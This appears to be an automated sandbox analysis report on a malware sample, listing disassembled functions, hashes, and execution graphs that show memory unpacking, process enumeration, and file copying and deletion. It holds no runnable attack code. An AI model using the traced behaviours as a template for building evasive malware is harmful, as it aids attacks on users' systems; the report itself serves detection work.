                                                                                                                                                  • Instruction Fuzzy Hash: A12186317116054BE70CCE2EC899575B3D6F7D9205B54C67DD15BCB357C93658038A08
                                                                                                                                                  Function 024D5B3E Relevance: .1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                                                                                                  • Instruction ID: 3ca7d0d8875ffc3bc230cb07fd49bdda0f0d815a1a5e557f6d72fabb1242a7a0
                                                                                                                                                  • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                                                                                                  • Instruction Fuzzy Hash: 8511E1723108008FD75CCF3DCD9A66933D6EB89304B48C2BDE51ACB26ADA358543CB44
                                                                                                                                                  Function 024E0D62 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 024E0DBF
                                                                                                                                                    • Part of subcall function 024E3122: __GetUnwindTryBlock.LIBCMT ref: 024E3165
                                                                                                                                                    • Part of subcall function 024E3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 024E318A
                                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 024E0E97
                                                                                                                                                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 024E10E5
                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 024E11F2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                  • Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                                                                                                                                                  • Instruction ID: 5b9cd5ed99f01840263ecbf1ea93b09050aa76da7ae2dbb7ee1548dbdd2f1f55
                                                                                                                                                  • Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                                                                                                                                                  • Instruction Fuzzy Hash: 58E1B130518B488FEF25EF68C4856AAB7E1FB99315F10165FD48ED7211DB74E882CB82
                                                                                                                                                  Function 024E1232 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 462COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 024E13D0
                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 024E16F9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                  • API String ID: 3523768491-393685449
                                                                                                                                                  • Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                                                                                                                                                  • Instruction ID: a91f2fa630f660341febad33e7942883f4fe9179703cf8e8add18c80276bbdfb
                                                                                                                                                  • Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                                                                                                                                                  • Instruction Fuzzy Hash: 0FE1E430518B488FEF25EF29C4856AA77E1FB55315F14066FD49F8B612DB70E882CB82
                                                                                                                                                  Function 024E0632 Relevance: 7.9, APIs: 5, Instructions: 439COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                  • Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                                                                                                                                                  • Instruction ID: 09b64267bcceaad994ea3948a746333a40348a0107aed79c891891cec108293b
                                                                                                                                                  • Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                                                                                                                                                  • Instruction Fuzzy Hash: 70C1F530518E0E8FFF29AF288054276B3D1FBA4716B54666FC4ABD7255DBB0D4828BC0
                                                                                                                                                  Function 024DA412 Relevance: 7.8, Strings: 6, Instructions: 289COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $($2$H$P!`$`
                                                                                                                                                  • API String ID: 0-2682688576
                                                                                                                                                  • Opcode ID: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                                                                                                                                                  • Instruction ID: 4931aa3d81e8481e476b3141a56b1e77253ef16abaec7d92f9ba14cb3da2952a
                                                                                                                                                  • Opcode Fuzzy Hash: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                                                                                                                                                  • Instruction Fuzzy Hash: 42C1F4B09187988FD7A4DF18C08879ABBE1FB99304F508A6ED8CDCB215DB705589CF46
                                                                                                                                                  Function 024E19A6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 024E1A61
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallTranslator
                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                                  • Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                                                                                                                                                  • Instruction ID: 2cf6796adab33fd5ed3bf003f342ed2a605dab0df1d0bd0544f987261279b6cc
                                                                                                                                                  • Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                                                                                                                                                  • Instruction Fuzzy Hash: 66A18130918B488FDF19EF6CC485AA9BBE1FB99305F14465EE44AC7211DB74E981CB81
                                                                                                                                                  Function 024E006A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 024E0095
                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 024E012C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                                  • Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                                                                                                                                                  • Instruction ID: 4760056c16719c06dc09bb73f5160a7e4315b8eb7c24717b76800e31830458e9
                                                                                                                                                  • Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                                                                                                                                                  • Instruction Fuzzy Hash: A361093060CA088BEF28EE5CD884B7573D1FB54356F00516EE897DB256E7B1EC918B85
                                                                                                                                                  Function 024E1736 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 024E17E1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallTranslator
                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                                  • Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                                                                                                                                                  • Instruction ID: 2f0370094601366529f893f53aa7e668b801598112b5b13060fc126c9a16dbc4
                                                                                                                                                  • Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                                                                                                                                                  • Instruction Fuzzy Hash: D871B43051CB488FEB69DF58C446BAAB7E0FB99305F144A5ED48EC3211DB74E581CB86
                                                                                                                                                  Function 024E27F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 024E28A0
                                                                                                                                                  • _CreateFrameInfo.LIBVCRUNTIME ref: 024E28C9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                                                  • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                                                                                                  • Instruction ID: 52c33a24baf059f24677adde08a1fbf6697899ff31360b282e6b23c5ce501146
                                                                                                                                                  • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                                                                                                  • Instruction Fuzzy Hash: 005164B0518B458FEB60EF29C48567A77E1FB99352F10155FE48AC7221DB70E842CF86

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:59.2%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:11
                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                  execution_graph 89 2840650 90 2840665 89->90 95 2840620 VirtualAlloc 90->95 92 28406d0 96 28401b0 VirtualAlloc 92->96 95->92 97 284023b VirtualProtect 96->97 99 2840321 VirtualFree 97->99 102 284030c 97->102 100 2840347 VirtualFree VirtualAlloc 99->100 100->102 101 2840531 102->101 103 28404f9 VirtualProtect 102->103 103->102

                                                                                                                                                  Callgraph

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 028401B0 Relevance: 9.3, APIs: 6, Instructions: 317memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.3263620250.0000000002840000.00000040.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_2840000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocFreeProtect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 267585107-0
                                                                                                                                                  • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                                                                                                  • Instruction ID: 7b81c156919496f3fe4b5cd383926a253b67550c4e6849082747074593e73791
                                                                                                                                                  • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                                                                                                  • Instruction Fuzzy Hash: 1FC1CD3421CA488FD788EF5CC498B6AB7E1FB98305F51585DF58AC7261DBB4E881CB42
                                                                                                                                                  Function 02840620 Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 34 2840620-2840644 VirtualAlloc
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.3263620250.0000000002840000.00000040.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_2840000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                                                                                                  • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                                                                                                                                                  • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                                                                                                  • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:6.5%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:9.3%
                                                                                                                                                  Total number of Nodes:1673
                                                                                                                                                  Total number of Limit Nodes:8
                                                                                                                                                  execution_graph 9834 7ff77572fd98 9835 7ff77572f663 6 API calls 9834->9835 9836 7ff77572fdb4 9835->9836 10433 7ff77572749c 10434 7ff7757274fd 10433->10434 10435 7ff7757274bd 10433->10435 10438 7ff7757214e2 6 API calls 10434->10438 10436 7ff7757274c2 10435->10436 10437 7ff775727536 10435->10437 10440 7ff77572756f 10436->10440 10441 7ff7757274d6 strlen strlen 10436->10441 10439 7ff7757214e2 6 API calls 10437->10439 10443 7ff775727526 10438->10443 10439->10443 10442 7ff7757214e2 6 API calls 10440->10442 10441->10443 10442->10443 9852 7ff77572c59e 9853 7ff77572c5b4 9852->9853 9858 7ff77572c130 9853->9858 9855 7ff77572ca67 9856 7ff77572b3e7 fputc 9857 7ff77572c382 9856->9857 9857->9855 9857->9856 9859 7ff77572c141 9858->9859 9867 7ff77572b2d0 9859->9867 9862 7ff77572c186 9864 7ff77572b5da fputc 9862->9864 9863 7ff77572c193 9871 7ff77572c08a 9863->9871 9866 7ff77572c191 9864->9866 9866->9857 9868 7ff77572b2ee 9867->9868 9869 7ff77572e4e0 6 API calls 9868->9869 9870 7ff77572b3e1 9869->9870 9870->9862 9870->9863 9872 7ff77572c0ac 9871->9872 9877 7ff77572b721 9872->9877 9875 7ff77572b3e7 fputc 9876 7ff77572c118 9875->9876 9880 7ff77572b73d 9877->9880 9878 7ff77572b78e 9879 7ff77572b3e7 fputc 9878->9879 9881 7ff77572b82b 9878->9881 9879->9881 9880->9878 9883 7ff77572b3e7 fputc 9880->9883 9882 7ff77572b831 9881->9882 9888 7ff77572b3e7 fputc 9881->9888 9884 7ff77572b867 9882->9884 9885 7ff77572b83a 9882->9885 9883->9880 9886 7ff77572b3e7 fputc 9884->9886 9889 7ff77572b8bc 9884->9889 9894 7ff77572b420 5 API calls 9884->9894 9887 7ff77572b3e7 fputc 9885->9887 9886->9884 9887->9889 9888->9881 9890 7ff77572b64c 11 API calls 9889->9890 9895 7ff77572b8d0 9889->9895 9890->9895 9891 7ff77572b8e8 9892 7ff77572b910 9891->9892 9896 7ff77572b3e7 fputc 9891->9896 9892->9875 9893 7ff77572b3e7 fputc 9893->9895 9894->9884 9895->9891 9895->9893 9896->9891 10444 7ff77572c49e 10445 7ff77572c4a7 10444->10445 10450 7ff77572b593 10445->10450 10451 7ff77572b5a3 10450->10451 10452 7ff77572b5c1 strlen 10451->10452 10453 7ff77572b5ba 10451->10453 10452->10453 10934 7ff7757303ab ___mb_cur_max_func ___lc_codepage_func 10935 7ff7757303da 10934->10935 10936 7ff775730150 4 API calls 10935->10936 10937 7ff7757303f9 10936->10937 9284 7ff7757306b1 GetLastError 9906 7ff7757305b1 VirtualProtect 9907 7ff77573b652 9906->9907 9924 7ff77572e1b5 9925 7ff77572e1bd localeconv 9924->9925 9927 7ff77572db86 9924->9927 9926 7ff77573026c 6 API calls 9925->9926 9926->9927 9928 7ff77572ccd9 fputwc fwprintf 9927->9928 9929 7ff77572e2e0 9927->9929 9928->9927 9930 7ff77572e301 9929->9930 9931 7ff77572ccd9 2 API calls 9929->9931 9931->9930 10472 7ff77572c4b9 10473 7ff77572c4c7 10472->10473 10474 7ff77572c50e 10473->10474 10475 7ff77572c4fe 10473->10475 10476 7ff77572b9b0 fputc 10474->10476 10477 7ff77572bbb4 fputc 10475->10477 10480 7ff77572c382 10476->10480 10477->10480 10478 7ff77572ca67 10479 7ff77572b3e7 fputc 10479->10480 10480->10478 10480->10479 10960 7ff775721bbb 10961 7ff775721bcc 10960->10961 10962 7ff775721bf4 10960->10962 10964 7ff775721bd1 10961->10964 10965 7ff7757214e2 6 API calls 10961->10965 10963 7ff7757214e2 6 API calls 10962->10963 10963->10964 10965->10964 10966 7ff7757237c0 10967 7ff775721cf4 8 API calls 10966->10967 10968 7ff7757237d0 10967->10968 10969 7ff775721c73 8 API calls 10968->10969 10971 7ff775723816 10968->10971 10970 7ff7757237e4 10969->10970 10970->10971 10972 7ff7757237fc 10970->10972 10973 7ff775723820 GetLastError 10970->10973 10974 7ff7757214e2 6 API calls 10972->10974 10975 7ff7757214e2 6 API calls 10973->10975 10974->10971 10975->10971 9940 7ff775725dc4 9941 7ff775725de5 9940->9941 9942 7ff775725deb CloseHandle 9941->9942 9943 7ff775725df4 9941->9943 9942->9943 9948 7ff77572c5cf 9949 7ff77572c5e5 9948->9949 9954 7ff77572b919 9949->9954 9951 7ff77572ca67 9952 7ff77572b3e7 fputc 9953 7ff77572c382 9952->9953 9953->9951 9953->9952 9955 7ff77572b92a 9954->9955 9956 7ff77572b2d0 6 API calls 9955->9956 9957 7ff77572b957 9956->9957 9958 7ff77572b979 9957->9958 9959 7ff77572b96c 9957->9959 9960 7ff77572b721 11 API calls 9958->9960 9961 7ff77572b5da fputc 9959->9961 9962 7ff77572b984 9960->9962 9964 7ff77572b977 9961->9964 9963 7ff77572b3e7 fputc 9962->9963 9962->9964 9963->9962 9964->9953 9294 7ff77572a6d0 9295 7ff77572a6f7 9294->9295 9296 7ff77572a763 fprintf 9295->9296 10994 7ff775726fd5 10995 7ff775726feb GetSystemTimeAsFileTime 10994->10995 10996 7ff775726fe0 10994->10996 10995->10996 9974 7ff7757305d9 SetUnhandledExceptionFilter 9975 7ff7757289d9 9976 7ff775728a13 CloseHandle 9975->9976 9989 7ff77572860e 9976->9989 9977 7ff775728669 Process32Next 9978 7ff77572867d GetLastError 9977->9978 9977->9989 9978->9989 9979 7ff775728ca5 CloseHandle 9980 7ff775728cb5 9979->9980 9981 7ff77572a1f1 11 API calls 9981->9989 9982 7ff7757288cd OpenProcess 9983 7ff775728a78 GetLastError 9982->9983 9984 7ff7757288ee QueryFullProcessImageNameW 9982->9984 9986 7ff7757214e2 6 API calls 9983->9986 9985 7ff77572892e GetLastError 9984->9985 9984->9989 9987 7ff7757214e2 6 API calls 9985->9987 9986->9989 9987->9989 9988 7ff775728153 29 API calls 9988->9989 9989->9976 9989->9977 9989->9979 9989->9981 9989->9982 9989->9988 9990 7ff7757214e2 6 API calls 9989->9990 9990->9989 9306 7ff7757302d7 9307 7ff7757302fd ___lc_codepage_func ___mb_cur_max_func 9306->9307 9308 7ff7757302f6 9306->9308 9309 7ff775730318 9307->9309 9314 7ff775730358 9307->9314 9308->9307 9310 7ff775730361 9309->9310 9313 7ff775730323 9309->9313 9309->9314 9311 7ff775730150 4 API calls 9310->9311 9310->9314 9311->9310 9313->9314 9315 7ff775730150 9313->9315 9316 7ff775730170 9315->9316 9323 7ff77573018c 9315->9323 9317 7ff775730254 9316->9317 9319 7ff7757301aa 9316->9319 9320 7ff7757301df IsDBCSLeadByteEx 9316->9320 9316->9323 9318 7ff77573021f MultiByteToWideChar 9317->9318 9317->9323 9321 7ff775730244 _errno 9318->9321 9318->9323 9322 7ff7757301c6 MultiByteToWideChar 9319->9322 9319->9323 9320->9317 9320->9319 9321->9323 9322->9321 9322->9323 9323->9313 9991 7ff77572add8 9992 7ff77572ae3e 9991->9992 9993 7ff77572adf3 9991->9993 9993->9992 9994 7ff77572ae0d EnterCriticalSection LeaveCriticalSection 9993->9994 9994->9992 10506 7ff77572dcdd strerror 10513 7ff77572cfc8 10506->10513 10514 7ff77572cfd8 10513->10514 10515 7ff77572cfef 10514->10515 10516 7ff77572cff6 strlen 10514->10516 10516->10515 11006 7ff77572c3dc 11007 7ff77572b3e7 fputc 11006->11007 11009 7ff77572c382 11007->11009 11008 7ff77572ca67 11009->11008 11010 7ff77572b3e7 fputc 11009->11010 11010->11009 9333 7ff7757306e1 FreeLibrary 11011 7ff77572afe1 strlen 11012 7ff77572aff9 11011->11012 11014 7ff77572b043 11011->11014 11013 7ff77572b026 strncmp 11012->11013 11012->11014 11013->11012 11013->11014 11015 7ff77572a3e1 11016 7ff77572a3f9 11015->11016 11017 7ff77572a43e 11015->11017 11018 7ff77572a46e 11016->11018 11019 7ff77572a3fe 11016->11019 11020 7ff7757214e2 6 API calls 11017->11020 11022 7ff7757214e2 6 API calls 11018->11022 11021 7ff775729ed0 8 API calls 11019->11021 11024 7ff77572a41b 11020->11024 11023 7ff77572a411 11021->11023 11022->11024 11023->11024 11025 7ff77572a4a1 strlen GetProcessHeap HeapAlloc 11023->11025 11026 7ff77572a52d 11025->11026 11027 7ff77572a4d3 11025->11027 11029 7ff7757214e2 6 API calls 11026->11029 11027->11024 11028 7ff77572a4db strlen 11027->11028 11033 7ff775726e61 11028->11033 11029->11027 11032 7ff77572a511 GetProcessHeap HeapFree 11032->11024 11034 7ff775726e71 11033->11034 11035 7ff775726e93 11033->11035 11036 7ff775726ec6 11034->11036 11037 7ff775726e76 11034->11037 11038 7ff7757214e2 6 API calls 11035->11038 11042 7ff7757214e2 6 API calls 11036->11042 11039 7ff775726ef9 11037->11039 11040 7ff775726e7c 11037->11040 11041 7ff775726e85 11038->11041 11043 7ff7757214e2 6 API calls 11039->11043 11040->11041 11044 7ff7757214e2 6 API calls 11040->11044 11041->11024 11041->11032 11042->11041 11043->11041 11044->11041 10011 7ff7757265e3 10012 7ff7757265f9 10011->10012 10013 7ff775726684 10011->10013 10015 7ff775726602 10012->10015 10016 7ff7757266b4 10012->10016 10014 7ff7757214e2 6 API calls 10013->10014 10025 7ff7757266ad 10014->10025 10017 7ff77572660e strlen 10015->10017 10018 7ff7757266e4 10015->10018 10019 7ff7757214e2 6 API calls 10016->10019 10021 7ff775726620 10017->10021 10017->10025 10020 7ff7757214e2 6 API calls 10018->10020 10019->10025 10020->10025 10022 7ff775726640 strlen 10021->10022 10023 7ff77572662f strlen 10021->10023 10030 7ff77572743a 10022->10030 10023->10022 10028 7ff7757214e2 6 API calls 10025->10028 10026 7ff775726656 strlen 10027 7ff7757214e2 6 API calls 10026->10027 10029 7ff77572667a 10027->10029 10028->10029 10031 7ff775727456 10030->10031 10031->10026 11045 7ff77572c7ec 11046 7ff77572c382 11045->11046 11047 7ff77572ca67 11046->11047 11048 7ff77572b3e7 fputc 11046->11048 11048->11046 10048 7ff7757305f1 QueryFullProcessImageNameW 11049 7ff77572c3f0 11050 7ff77572c417 11049->11050 11051 7ff77572c423 11049->11051 11053 7ff77572b420 5 API calls 11050->11053 11055 7ff77572c382 11050->11055 11052 7ff77572b4fe fputc 11051->11052 11052->11050 11053->11055 11054 7ff77572ca67 11055->11054 11056 7ff77572b3e7 fputc 11055->11056 11056->11055 10049 7ff77572ddf7 10050 7ff77572de0d 10049->10050 10057 7ff77572d93d 10050->10057 10052 7ff77572db86 10053 7ff77572e2e0 10052->10053 10056 7ff77572ccd9 fputwc fwprintf 10052->10056 10054 7ff77572e301 10053->10054 10055 7ff77572ccd9 2 API calls 10053->10055 10055->10054 10056->10052 10058 7ff77572d94e 10057->10058 10059 7ff77572d00f 6 API calls 10058->10059 10060 7ff77572d97e 10059->10060 10061 7ff77572d9a0 10060->10061 10062 7ff77572d993 10060->10062 10064 7ff77572d897 9 API calls 10061->10064 10063 7ff77572cc00 10 API calls 10062->10063 10065 7ff77572d99e 10063->10065 10064->10065 10065->10052 10552 7ff7757258fa 10557 7ff775725189 10552->10557 10555 7ff77572590f 10558 7ff775725219 CopyFileA 10557->10558 10561 7ff7757251b1 10557->10561 10559 7ff775725242 GetLastError 10558->10559 10558->10561 10560 7ff7757214e2 6 API calls 10559->10560 10567 7ff77572526c 10560->10567 10563 7ff7757251e8 10561->10563 10561->10567 10562 7ff7757214e2 6 API calls 10564 7ff7757253ba 10562->10564 10565 7ff7757214e2 6 API calls 10563->10565 10564->10564 10566 7ff775725209 10565->10566 10566->10555 10568 7ff775724bbd 10566->10568 10567->10562 10569 7ff775724bd4 DeleteFileA 10568->10569 10572 7ff775724bde 10568->10572 10570 7ff775724c2b GetLastError 10569->10570 10569->10572 10571 7ff7757214e2 6 API calls 10570->10571 10571->10572 10574 7ff775724d5a 10572->10574 10575 7ff775724c0a 10572->10575 10573 7ff7757214e2 6 API calls 10577 7ff775724d7c 10573->10577 10574->10573 10576 7ff7757214e2 6 API calls 10575->10576 10578 7ff775724c20 10576->10578 10577->10577 10578->10555 10579 7ff77572dcf8 10582 7ff77572dd06 10579->10582 10580 7ff77572dd4f 10584 7ff77572d1bd fputwc 10580->10584 10581 7ff77572dd3f 10583 7ff77572d3c1 fputwc 10581->10583 10582->10580 10582->10581 10585 7ff77572db86 10583->10585 10584->10585 10586 7ff77572e2e0 10585->10586 10589 7ff77572ccd9 fputwc fwprintf 10585->10589 10587 7ff77572e301 10586->10587 10588 7ff77572ccd9 2 API calls 10586->10588 10588->10587 10589->10585 8694 7ff7757212fd 8697 7ff775721131 8694->8697 8698 7ff77572115a 8697->8698 8699 7ff775721172 8698->8699 8700 7ff775721169 Sleep 8698->8700 8701 7ff775721188 _amsg_exit 8699->8701 8702 7ff775721194 8699->8702 8700->8698 8703 7ff7757211b5 8701->8703 8702->8703 8704 7ff77572119a _initterm 8702->8704 8705 7ff7757211de 8703->8705 8706 7ff7757211c5 _initterm 8703->8706 8704->8703 8718 7ff77572a96b 8705->8718 8706->8705 8709 7ff77572122e 8710 7ff775721233 malloc 8709->8710 8711 7ff775721253 8710->8711 8712 7ff775721258 strlen malloc 8711->8712 8713 7ff775721283 8711->8713 8712->8711 8729 7ff7757214b8 8713->8729 8715 7ff7757212c4 8716 7ff7757212e8 8715->8716 8717 7ff7757212e3 _cexit 8715->8717 8717->8716 8719 7ff775721208 SetUnhandledExceptionFilter 8718->8719 8721 7ff77572a989 8718->8721 8719->8709 8720 7ff77572ab8f 8720->8719 8723 7ff77572abb7 VirtualProtect 8720->8723 8721->8720 8722 7ff77572aa00 8721->8722 8727 7ff77572aa3f 8721->8727 8722->8720 8724 7ff77572aa1e 8722->8724 8723->8720 8724->8722 8733 7ff77572a824 8724->8733 8726 7ff77572a824 3 API calls 8726->8727 8727->8720 8728 7ff77572aaaa 8727->8728 8728->8726 8730 7ff7757214c8 8729->8730 